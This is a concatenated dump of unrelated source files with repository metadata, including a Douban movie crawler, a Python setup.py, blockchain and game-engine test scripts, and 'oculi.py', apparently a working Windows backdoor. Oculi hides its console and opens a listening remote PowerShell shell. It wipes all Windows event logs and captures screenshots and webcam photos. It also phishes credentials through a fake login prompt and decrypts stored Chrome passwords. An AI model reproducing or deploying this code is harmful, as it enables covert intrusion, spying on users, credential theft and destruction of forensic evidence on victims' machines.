    # Serialize one movie's info dict into <dirname>/<n>.txt.
    def _write_file(self, dirname, info, n):
        filename = os.path.join(dirname, "{}.txt".format(n))
        f = open(filename, 'w')
        json.dump(info, f)
        f.close()

    # Internal crawl loop shared by spider().
    def _spider(self, dirname, mission, timeout, num):
        record = dict()  # url -> number of failed attempts so far
        # Crawl until the queue is drained or `num` movies were saved
        # (num == -1 means unlimited).
        while (not mission.empty()) and ((self._n <= num) or (num == -1)):
            url = mission.get(timeout=5)
            try:
                if url not in self._visited:
                    response = requests.get(url, headers=HEADER, timeout=timeout)
                else:
                    logging.info("%s is in %s" % (url, self._visited.index(url)))
                    continue
            except Exception as err:
                # Network error: back off, requeue, and count the failure.
                was = record.get(url, 0)
                logging.error("%s error !\nError is %s!\n Wait a moment!\n" % (url, str(err)))
                time.sleep(10)
                mission.put(url)
                record[url] = was + 1
            else:
                if str(response.status_code) != '200':
                    # HTTP error: retry up to 3 times, then give up on this URL.
                    logging.error("url:%s The code is %s" % (url, response.status_code))
                    was = record.get(url, 0)
                    if was == 2:
                        logging.error(url + " Give Up!\n")
                        time.sleep(5)
                        continue
                    mission.put(url)
                    time.sleep(10)
                    record[url] = was + 1
                    continue
                else:
                    # Successful fetch: enqueue outgoing links, parse and save.
                    response.encoding = "utf-8"
                    html = response.text
                    next_url_list = self._get_movie_url(html)
                    for next_url in next_url_list:
                        mission.put(next_url)
                    try:
                        info = self._get_info(html)
                        self._write_file(dirname, info, self._n)
                    except Exception as err:
                        logging.error("URL: %s Get information error! Reason: " % (url) + str(err))
                        time.sleep(10)
                    else:
                        logging.info("%s succeed! Already finish %d/%d\n" % (url, self._n, num))
                        # _visited is shared with the checkpoint thread.
                        if self._mutex.acquire():
                            self._visited.append(url)
                            self._mutex.release()
                        self._n += 1
            # Politeness delay between requests (10-21 seconds).
            time.sleep(random.randrange(10, 22, 1))

    # Build the collected library under `dirname`.
    def spider(self, dirname, timeout=5, num=-1):
        """Start the checkpoint thread, seed the queue from the front page and
        run the crawl loop until `num` movies are saved (-1 = unlimited)."""
        # Start the checkpoint thread.
        check_t = threading.Thread(target=self._check, name="check")
        check_t.start()
        # Open the front page to seed the mission queue.
        response = requests.get(self._url, headers=HEADER, timeout=timeout)
        if str(response.status_code) != '200':
            print("Begin Failed!")
        response.encoding = "utf-8"
        html = response.text
        movie_url = self._get_movie_url(html)
        for url in movie_url:
            self._mission.put(url, timeout=5)
        self._spider(dirname=dirname, mission=self._mission, timeout=timeout, num=num)
        # Signal the checkpoint thread to write its final snapshot and exit.
        self._threading_flag = False
# if __name__ == '__main__':
# # f = open("123.html",'r',encoding='utf-8')
# # html = f.read()
# # f.close()
# d = DouBanMovieSpider()
# # res = d._get_movie_url(html)
# # print(res)
# # info = d._get_info(html)
# # for key,value in info.items():
# # print(key+": "+str(value))
# # res = d.get_new_movie()
# # for movie in res:
# # print(movie)
# d.spider("F://doubandata",num=10) | 25.587629 | 97 | 0.636785 |
ace94b0061d1a5336a70247cba3984c682a0cb38 | 583 | py | Python | setup.py | MiLL4U/ibwpy | fc73c165af8445f97106edbeadcf340987e1d508 | [
"MIT"
] | null | null | null | setup.py | MiLL4U/ibwpy | fc73c165af8445f97106edbeadcf340987e1d508 | [
"MIT"
] | null | null | null | setup.py | MiLL4U/ibwpy | fc73c165af8445f97106edbeadcf340987e1d508 | [
"MIT"
] | null | null | null | import setuptools
def _requires_from_file(filename):
return open(filename).read().splitlines()
# Package metadata for the ibwpy distribution.  Runtime dependencies are
# kept in requirements.txt and read via _requires_from_file so they live
# in a single place.
setuptools.setup(
    name="ibwpy",
    version="1.0.0",
    install_requires=_requires_from_file('requirements.txt'),
    author="Hiroaki Takahashi",
    author_email="aphiloboe@gmail.com",
    description="Edit Igor Pro binary wave files",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.7',
)
| 27.761905 | 61 | 0.670669 |
ace94b9b9b801ef21a9b5c40c5e3dc0f613b53f5 | 15,202 | py | Python | src/oculi.py | spicesouls/oculi | d2594a99f78bb13a1b5e469d08bfebc435b49661 | [
"MIT"
] | 6 | 2021-04-17T22:22:00.000Z | 2021-08-30T09:29:36.000Z | src/oculi.py | spicesouls/oculi | d2594a99f78bb13a1b5e469d08bfebc435b49661 | [
"MIT"
] | null | null | null | src/oculi.py | spicesouls/oculi | d2594a99f78bb13a1b5e469d08bfebc435b49661 | [
"MIT"
] | 1 | 2021-08-07T12:55:02.000Z | 2021-08-07T12:55:02.000Z | from colorama import init, Fore, Style, Back
init()
red = '\033[38;5;196m'
yellow = '\033[38;5;226m'
banner = rf'''{red}
▄██████▄ ▄████████ ███ █▄ ▄█ ▄█ {yellow}(v1.0){red}
███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ █▀ ███ ███ ███ ███▌
███ ███ ███ ███ ███ ███ ███▌
███ ███ ███ ███ ███ ███ ███▌
███ ███ ███ █▄ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ███▌ ▄ ███
▀██████▀ ████████▀ ████████▀ █████▄▄██ █▀
----------- {yellow}developed by spicesouls{red} -----------
''' + Style.RESET_ALL
import socket
import subprocess
import os
import sys
import json
import base64
import random
import win32api
import win32console
import win32gui
import win32crypt
import platform
import re
import pygame
import pygame.camera
import sqlite3
from Crypto.Cipher import AES
from datetime import timezone, datetime, timedelta
import uuid
import getpass
import shutil
import psutil
PORT=1337
screenshotpscode = '''[Reflection.Assembly]::LoadWithPartialName("System.Drawing"); function screenshot([Drawing.Rectangle]$bounds, $path) {$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height; $graphics = [Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size); $bmp.Save($path); $graphics.Dispose(); $bmp.Dispose()}; $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, SYSTEMMETRICSONE, SYSTEMMETRICSTWO); screenshot $bounds "PATH2REPLACE"'''
phishpscode = '''while($true){$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "");if($credential){$creds = $credential.GetNetworkCredential(); [String]$user = $creds.username; [String]$pass = $creds.password; Set-Content $env:temp\\fish.txt $user":"$pass; break}}'''
def hideconsole():
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
def startbackdoor():
# Bind to Host & IP
while True:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(('0.0.0.0', PORT))
s.listen()
conn, addr = s.accept()
with conn:
conn.send(bytes(banner,'utf-8'))
while True:
conn.send(bytes(f'{yellow}{getpass.getuser()}{Fore.RESET}@{red}Oculi{Fore.RESET} {Style.BRIGHT}>>{Style.RESET_ALL} ','utf-8'))
instruction = conn.recv(4096).decode().strip()
if not instruction:
break
elif instruction == 'help':
conn.send(bytes(Style.BRIGHT + r'''
HELP
-====-''' + Style.RESET_ALL + r'''
help ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Displays this message
shell ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Drop into a Shell
whoami ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get Current User
sysinfo ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get System Info
pid ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get Process ID
banner ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Display the banner
ping ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get the Network Ping Latency
clearlog ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Wipe Windows Event Logs
screenshot ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Take a Screenshot of the Main Display
webcam ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Take a Photo through an availabe webcam
phish ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Phish the user for their credentials
chrome ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Steal Chrome Passwords
exit ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Exit Oculi (Does not kill the program)
kill ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Kill Oculi
''','utf-8'))
elif instruction == 'shell':
conn.send(bytes(Style.BRIGHT + "Type 'exit' to leave the shell.\n" + Style.RESET_ALL,'utf-8'))
while True:
pwd = bytes(os.getcwd(), 'utf-8')
conn.send(b'PS ' + pwd + b'> ')
data = conn.recv(4096)
if data.decode('utf-8')[:2] == 'cd':
os.chdir(data.decode('utf-8').replace('\n','')[3:])
elif data.decode().lower().strip() == 'exit':
break
else:
if data.decode().strip() != '':
try:
result = subprocess.getoutput('powershell.exe ' + data.decode().strip()) + '\n'
conn.send(bytes(result,'utf-8'))
except Exception as e:
conn.send(bytes('Error: ' + str(e) + '\n','utf-8'))
else:
pass
elif instruction == 'whoami': conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + subprocess.getoutput('whoami') + '\n','utf-8'))
elif instruction == 'sysinfo':
conn.send(bytes(rf'''{Style.BRIGHT}
+---- System Info ----+{Style.RESET_ALL}
System {Style.BRIGHT}:{Style.RESET_ALL} {platform.system()}
Version {Style.BRIGHT}:{Style.RESET_ALL} {platform.version()}
Arch {Style.BRIGHT}:{Style.RESET_ALL} {platform.machine()}
Hostname {Style.BRIGHT}:{Style.RESET_ALL} {socket.gethostname()}
IP {Style.BRIGHT}:{Style.RESET_ALL} {addr[0]}
MAC {Style.BRIGHT}:{Style.RESET_ALL} {':'.join(re.findall('..', '%012x' % uuid.getnode()))}
Processor {Style.BRIGHT}:{Style.RESET_ALL} {platform.processor()}
RAM {Style.BRIGHT}:{Style.RESET_ALL} {str(round(psutil.virtual_memory().total / (1024.0 **3)))+" GB"} {Style.BRIGHT}
+---------------------+{Style.RESET_ALL}
''','utf-8'))
elif instruction == 'pid':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'PID: {str(os.getpid())}\n','utf-8'))
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'PPID: {str(os.getppid())}\n','utf-8'))
elif instruction == 'banner': conn.send(bytes(banner,'utf-8'))
elif instruction == 'ping':
param = '-n' if platform.system().lower()=='windows' else '-c'
pingcommand = ['ping', param, '1', addr[0]]
pingresult = subprocess.check_output(pingcommand)
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Pinging Client IP...\n','utf-8'))
conn.send(pingresult + b'\n')
elif instruction == 'clearlog':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Getting Event Logs...\n','utf-8'))
eventlogs = subprocess.getoutput('wevtutil el').split('\n')
conn.send(bytes(f'\tFound {Style.BRIGHT}{str(len(eventlogs))}{Style.RESET_ALL} Event Logs.\n','utf-8'))
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Clearing Windows Logs...\n','utf-8'))
subprocess.check_output(["powershell.exe", """wevtutil el | Foreach-Object {wevtutil cl "$_"}"""])
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Finished!\n','utf-8'))
elif instruction == 'screenshot':
scnpath = os.getenv('TEMP')
scnpath += '\cache.png'
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Path: ' + Style.BRIGHT + scnpath + Style.RESET_ALL + '\n', 'utf-8'))
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Executing Powershell...\n','utf-8'))
subprocess.check_output(["powershell.exe", screenshotpscode.replace('PATH2REPLACE',scnpath).replace('SYSTEMMETRICSONE',str(win32api.GetSystemMetrics(0))).replace('SYSTEMMETRICSTWO',str(win32api.GetSystemMetrics(1)))])
conn.send(bytes(Fore.GREEN + '\n[+] ' + Fore.RESET + 'Success! Screenshot saved to ' + scnpath + '\n','utf-8'))
elif instruction == 'webcam':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Checking for Webcams...\n','utf-8'))
try:
pygame.camera.init()
cam = pygame.camera.Camera(0,(640,480))
cam.start()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Getting Picture through Webcam...\n','utf-8'))
img = cam.get_image()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Saving image to {os.getenv("TEMP")}\\webcam-cache.jpg ...\n','utf-8'))
pygame.image.save(img,os.getenv("TEMP") + "\\webcam-cache.jpg")
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Done! Closing Camera...\n','utf-8'))
cam.stop()
except Exception as e:
conn.send(bytes(Fore.RED + '[+] ' + Fore.RESET + f'Error finding/using a Webcam ({str(e)})\n','utf-8'))
elif instruction == 'phish':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Starting Phishing Window, Waiting for Target Input...\n', 'utf-8'))
subprocess.getoutput(['powershell.exe', phishpscode])
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Checking For Phishing Results...\n', 'utf-8'))
try:
with open(os.getenv('TEMP') + '\\fish.txt','r') as o:
phishresults = o.read()
o.close()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Success! Phishing Results:\n\n', 'utf-8'))
conn.send(bytes(phishresults,'utf-8') + b'\n')
except:
conn.send(bytes(Fore.RED + '[+] ' + Fore.RESET + 'Failure, Results not found\n', 'utf-8'))
elif instruction == 'chrome':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Attempting to Locate Chrome DB...\n','utf-8'))
chromelogins = []
def get_chrome_datetime(chromedate): return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
key = get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Reading Chrome DB...\n','utf-8'))
db = sqlite3.connect(filename)
cursor = db.cursor()
# `logins` table has the data we need
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
if username or password: chromelogins.append({"origin":origin_url,"action":action_url,"username":username,"password":password})
else: continue
cursor.close(); db.close()
try: os.remove(filename)
except: pass
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Done! {Style.BRIGHT}{str(len(chromelogins))}{Style.RESET_ALL} Logins Found\n','utf-8'))
with open(os.getenv('TEMP') + '\\chrome-cache.txt','w') as o:
for login in chromelogins:
o.write(f'''Created At: {login["origin"]}\nLogin Used At: {login["action"]}\nUsername: {login["username"]}\nPassword: {login["password"]}\n\n''')
o.close()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Logins written to {os.getenv("TEMP")}\\chrome-cache.txt\n','utf-8'))
elif instruction == 'exit':
conn.send(b'\n Bye Bye!\n')
conn.close()
break
elif instruction == 'kill':
conn.send(b'Are you sure you want to kill Oculi? [Y/N]\n > ')
confirmation = conn.recv(4096).decode().strip().upper()
if confirmation == 'Y':
conn.send(b'\n Killing Oculi...\n')
conn.close()
sys.exit()
else: conn.send(bytes(Fore.RED + '[+] ' + Fore.RESET + 'Command not found.\n', 'utf-8'))
hideconsole()
startbackdoor()
| 64.415254 | 510 | 0.476582 |
ace94c1f2eaac40263207f8675b6d46a4288c23f | 2,329 | py | Python | test/functional/feature_config_args.py | curvehashcoin/CurvehashCoin | 463e7bd7c8d1dea21e123ef7f9838c04ecb07f1f | [
"MIT"
] | 6 | 2020-11-30T05:50:48.000Z | 2021-07-07T18:30:08.000Z | test/functional/feature_config_args.py | curvehashcoin/CurvehashCoin | 463e7bd7c8d1dea21e123ef7f9838c04ecb07f1f | [
"MIT"
] | 2 | 2020-12-19T23:47:44.000Z | 2021-05-26T13:50:31.000Z | test/functional/feature_config_args.py | curvehashcoin/CurvehashCoin | 463e7bd7c8d1dea21e123ef7f9838c04ecb07f1f | [
"MIT"
] | 2 | 2020-11-14T22:25:22.000Z | 2020-11-16T02:57:46.000Z | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test various command line arguments and configuration file parameters."""
import os
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import get_datadir_path
class ConfArgsTest(BitcoinTestFramework):
    """Functional test for -datadir handling on the command line and in the config file."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1

    def run_test(self):
        self.stop_node(0)

        # Drop the -datadir argument so settings from the config file can take effect.
        self.nodes[0].args = [a for a in self.nodes[0].args if not a.startswith("-datadir")]

        base_dir = get_datadir_path(self.options.tmpdir, 0)
        missing_dir = os.path.join(base_dir, 'newdatadir')
        override_dir = os.path.join(base_dir, 'newdatadir2')

        # A -datadir argument pointing at a non-existent directory must abort startup.
        self.nodes[0].datadir = missing_dir
        self.assert_start_raises_init_error(0, ['-datadir='+missing_dir], 'Error: Specified data directory "' + missing_dir + '" does not exist.')

        # The same failure must occur when the bad datadir comes from the conf file.
        conf_file = os.path.join(base_dir, "curvehash.conf")
        with open(conf_file, 'a', encoding='utf8') as f:
            f.write("datadir=" + missing_dir + "\n")
        self.assert_start_raises_init_error(0, ['-conf='+conf_file], 'Error reading configuration file: specified data directory "' + missing_dir + '" does not exist.')

        # Once the directory exists, starting via the conf file succeeds.
        os.mkdir(missing_dir)
        self.start_node(0, ['-conf='+conf_file, '-wallet=w1'])
        self.stop_node(0)
        assert os.path.isfile(os.path.join(missing_dir, 'regtest', 'wallets', 'w1'))

        # An explicit -datadir argument takes precedence over the conf file.
        os.mkdir(override_dir)
        self.nodes[0].datadir = override_dir
        self.start_node(0, ['-datadir='+override_dir, '-conf='+conf_file, '-wallet=w2'])
        assert os.path.isfile(os.path.join(override_dir, 'regtest', 'wallets', 'w2'))
# Script entry point: run the functional test when invoked directly.
if __name__ == '__main__':
    ConfArgsTest().main()
| 46.58 | 169 | 0.694289 |
ace94d074ddf35887bce34e3c05b618f16636e0f | 10,983 | py | Python | Gem/PythonTests/Automated/test_suites/periodic/AssetCollectionLoadManager_test_case.py | incisor/o3de-atomtest | 026fef06827bf0dd559510882df5cb426ab00a99 | [
"Apache-2.0",
"MIT"
] | 2 | 2021-07-18T11:20:41.000Z | 2022-02-01T20:17:50.000Z | Gem/PythonTests/Automated/test_suites/periodic/AssetCollectionLoadManager_test_case.py | incisor/o3de-atomtest | 026fef06827bf0dd559510882df5cb426ab00a99 | [
"Apache-2.0",
"MIT"
] | 5 | 2021-07-14T02:24:07.000Z | 2021-10-04T21:24:35.000Z | Gem/PythonTests/Automated/test_suites/periodic/AssetCollectionLoadManager_test_case.py | incisor/o3de-atomtest | 026fef06827bf0dd559510882df5cb426ab00a99 | [
"Apache-2.0",
"MIT"
] | 7 | 2021-07-06T18:21:14.000Z | 2021-12-06T09:12:40.000Z | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Hydra script that is used to test the AssetCollectionAsyncLoader class inside the Editor.
This class detects when assets have been processed and loads them in memory - all loading is done asynchronously.
If this test fails be sure to review asset logs for asset failures.
See the run() function for more in-depth test info.
There are also in-line comments for each function detailing specific interactions as well as docstrings.
"""
import os
import sys
import shutil
from functools import partial
import azlmbr.bus as bus
import azlmbr.editor as editor
import azlmbr.test as aztest
import azlmbr.legacy.general as general
import azlmbr.math as math
import azlmbr.paths
import azlmbr.asset as asset
from azlmbr.entity import EntityId
sys.path.append(os.path.join(azlmbr.paths.devassets, "Gem", "PythonTests"))
from Automated.atom_utils.automated_test_utils import TestHelper as helper
def GetAssetsLists():
    """
    Builds the three path lists used by this test and returns them as a tuple:

    1. TXT source assets checked into the repo.  Their paths end in ".txt"
       so the Asset Processor leaves them alone.
    2. Temporary source assets that live only for the duration of this test
       suite.  Once copied into place the Asset Processor detects them and
       generates product assets.
    3. The expected product asset paths (relative to the asset cache).
    """
    srcNames = (
        ("ShaderBlendingOn.azsl.txt", "ShaderBlendingOn.azsl"),
        ("azshader-ShaderBlendingOn.shader.txt", "ShaderBlendingOn.shader"),
        ("streamingimage-checker8x8_512.png.txt", "checker8x8_512.png"),
        ("azmodel-cube_multimat_no_textures.fbx.txt", "cube_multimat_no_textures.fbx"),
        ("azmodel-cube.fbx.txt", "cube.fbx"),
    )
    productNames = (
        "ShaderBlendingOn.azshader",
        "checker8x8_512.png.streamingimage",
        "cube_multimat_no_textures.azmodel",
        "cube.azmodel",
    )
    gameRootPath = general.get_game_folder()
    # Relative to gameRootPath.
    srcTextFolder = os.path.normpath("Gem/PythonTests/Automated/TestData/AsyncAssetLoadTest")
    # Relative both to the gameRootPath folder and to the asset cache.
    dstSourceAssetFolder = os.path.normpath("TempData/AsyncAssetLoadTest")

    sourceTxtList = [os.path.join(gameRootPath, srcTextFolder, txtName) for txtName, _ in srcNames]
    sourceTempList = [os.path.join(gameRootPath, dstSourceAssetFolder, srcName) for _, srcName in srcNames]
    productList = [os.path.join(dstSourceAssetFolder, productName) for productName in productNames]
    return sourceTxtList, sourceTempList, productList
def CreateEntityWithComponent(entityName, componentClassName):
    """
    Ensures an entity named *entityName* exists (reusing one if found,
    creating it otherwise) and that a *componentClassName* component is
    attached to it.

    Returns the EntityId on success, otherwise None.
    """
    existing = helper.find_entities(entityName)
    if existing:
        # Reuse the first matching entity.
        entityId = existing[0]
        general.log(f"Found entity with name {entityName}.")
    else:
        # Create a brand-new entity and give it the requested name.
        entityId = editor.ToolsApplicationRequestBus(bus.Broadcast, 'CreateNewEntity', EntityId())
        editor.EditorEntityAPIBus(bus.Event, 'SetName', entityId, entityName)
        if entityId.IsValid():
            general.log("Entity successfully created.")
        else:
            general.log(f"Failed to create entity with name {entityName}.")
            return None
    # Attach the component (helper skips attachment if already present).
    if helper.attach_component_to_entity(entityId, componentClassName) is None:
        general.log(f"ERROR: Failed to add component [{componentClassName}] to entity named [{entityName}]")
        return None
    return entityId
def DeleteFilesInList(sourceTempList):
    """Best-effort removal of every file path in *sourceTempList*.

    Filesystem errors (typically the file not existing yet) are ignored so
    cleanup can always run.  Only OSError is swallowed: the original bare
    ``except`` would also have hidden KeyboardInterrupt and SystemExit.
    """
    for filePath in sourceTempList:
        try:
            os.remove(filePath)
        except OSError:
            pass
def path_is_valid_asset(asset_path):
    """Returns True when the asset catalog resolves *asset_path* to a valid AssetId."""
    return asset.AssetCatalogRequestBus(
        bus.Broadcast, "GetAssetIdByPath", asset_path, math.Uuid(), False
    ).invoke("IsValid")
def areAllProductAssetsInvalid(assetList):
    """
    Returns True only when no path in *assetList* refers to a valid asset.
    """
    return not any(path_is_valid_asset(productPath) for productPath in assetList)
def WaitUntilProductAssetsAreRemoved(assetList, waitTimeSeconds=30):
    """
    Blocks for at most *waitTimeSeconds*, returning early (True) as soon as
    none of the asset paths in *assetList* exist in the asset cache.
    """
    return helper.wait_for_condition(
        lambda: areAllProductAssetsInvalid(assetList), waitTimeSeconds
    )
def CopyFile(srcPath, dstPath):
    """
    Copies *srcPath* to *dstPath*, creating the destination directory tree
    as needed.  Returns True on success, False on failure (the failure is
    logged via general.log).
    """
    try:
        dstDir = os.path.dirname(dstPath)
        # dstDir is '' when dstPath has no directory component; makedirs('')
        # would raise, and the current directory always exists anyway.
        if dstDir:
            # exist_ok avoids the check-then-create race the original had,
            # and putting this inside the try means directory-creation
            # failures are reported instead of escaping to the caller.
            os.makedirs(dstDir, exist_ok=True)
        shutil.copyfile(srcPath, dstPath)
        return True
    except OSError as error:
        # OSError (not BaseException) so KeyboardInterrupt/SystemExit still propagate.
        general.log(f"ERROR: {error}")
        return False
def AllAssetsAreReadyPredicate(entityIdWithAsyncLoadTestComponent):
    """
    Predicate for helper.wait_for_condition: True once the component on the
    given entity reports zero pending assets.
    """
    remaining = aztest.AssetCollectionAsyncLoaderTestBus(
        bus.Event, "GetCountOfPendingAssets", entityIdWithAsyncLoadTestComponent
    )
    return remaining == 0
def run():
    """End-to-end test of AssetCollectionAsyncLoader inside the Editor.

    Phase 1: request products that do not exist yet and verify they all stay
    pending, none validate as loaded, and the job can be cancelled.
    Phase 2: re-request the same products, create the temporary source assets
    so the Asset Processor produces them, and verify they all load.
    Each failure logs an ERROR line and returns early.
    """
    # Define the source and product assets we will work with:
    sourceTxtList, sourceTempList, productList = GetAssetsLists()
    # Before we start we must delete the temporary source assets.
    DeleteFilesInList(sourceTempList)
    helper.init_idle()
    helper.open_level("EmptyLevel")
    myEntityId = CreateEntityWithComponent("TheAssetLoader", "AssetCollectionAsyncLoaderTest")
    if myEntityId is None:
        return
    # Wait for the Asset Processor to remove stale products from the cache.
    if not WaitUntilProductAssetsAreRemoved(productList):
        general.log("ERROR: The AP did not removed the producs")
        return
    # Start with a clean slate: cancel any pending jobs.
    aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "CancelLoadingAssets", myEntityId)
    expectedEmptyList = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetPendingAssetsList", myEntityId)
    if len(expectedEmptyList) != 0:
        general.log(f"ERROR: Was expecting 0 pending assets, instead got {len(expectedEmptyList)} pending assets")
        return
    # Submit a list of assets that don't exist yet; the AssetCollectionAsyncLoader
    # should accept them and start a background job.  Because the assets are not
    # in the asset cache, the pending list should equal the input list.
    if not aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "StartLoadingAssetsFromAssetList", myEntityId, productList):
        general.log(f"ERROR: Failed to submit assets for asynchronous loading. Tried to submit {len(productList)} assets for loading.")
        return
    general.log(f"SUCCESS: Assets were queued for loading. Total count: {len(productList)}")
    # Wait 1 second.  In theory we could wait forever, but 1 second is enough
    # to prove the point.
    general.idle_wait(1.0)
    # The input assets will never exist in this phase, so the pending list must
    # match the original list in size...
    pendingAssetList = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetPendingAssetsList", myEntityId)
    if len(productList) != len(pendingAssetList):
        general.log(f"ERROR: Was expecting the same list size. original list size={len(productList)}, pending list size={len(pendingAssetList)}")
        return
    # ...and in content.
    for assetPath in productList:
        if not assetPath in pendingAssetList:
            general.log(f"ERROR: Asset is not present in the pending list: {assetPath}")
            return
    general.log("SUCCESS: Pending list contains the same asset paths as the original list")
    # Expect failure when validating whether a given asset was loaded.
    for assetPath in productList:
        if aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "ValidateAssetWasLoaded", myEntityId, assetPath):
            general.log(f"ERROR: Asset should not be available: {assetPath}")
            return
    general.log("SUCCESS: No asset was available")
    # Cancel the load operation and make sure there are no pending assets to load.
    aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "CancelLoadingAssets", myEntityId)
    expectedEmptyList = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetPendingAssetsList", myEntityId)
    if len(expectedEmptyList) != 0:
        general.log(f"ERROR: Was expecting 0 pending assets, instead got {len(expectedEmptyList)} pending assets")
        return
    general.log("SUCCESS: Cancelled an impossible job")
    # Phase 2: request the same assets again, but this time the source assets
    # will eventually exist.
    if not aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "StartLoadingAssetsFromAssetList", myEntityId, productList):
        general.log(f"ERROR: Failed to submit assets for asynchronous loading. Tried to submit {len(productList)} assets for loading.")
        return
    general.log(f"SUCCESS: Assets were queued for loading. Total count: {len(productList)}")
    # Create the source assets so the Asset Processor produces the products.
    for src, dst in zip(sourceTxtList, sourceTempList):
        if not CopyFile(src, dst):
            general.log(f"ERROR: Failed to copy temp source asset [{src}] as [{dst}]")
            return
    general.log("SUCCESS: created the temporary source assets. Waiting for assets to be processed...")
    # Block (up to one hour) until the component reports zero pending assets.
    boundFunction = partial(AllAssetsAreReadyPredicate, myEntityId)
    if not helper.wait_for_condition(boundFunction, 3600.0):
        general.log("ERROR: Failed to load assets asynchronously")
        return
    general.log("SUCCESS: The AssetCollectionAsyncLoader loaded all requested assets. One more final verification...")
    # Every requested asset must now validate as loaded.
    for assetPath in productList:
        if not aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "ValidateAssetWasLoaded", myEntityId, assetPath):
            general.log(f"ERROR: Asset should be available: {assetPath}")
            return
    general.log("SUCCESS: The AssetCollectionAsyncLoader PASSED the test")
    # Cleanup.
    aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "CancelLoadingAssets", myEntityId)
    DeleteFilesInList(sourceTempList)
if __name__ == "__main__":
run()
| 43.411067 | 145 | 0.726851 |
ace94d6eba712c46e5379e6374836f0bca359634 | 2,260 | py | Python | SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
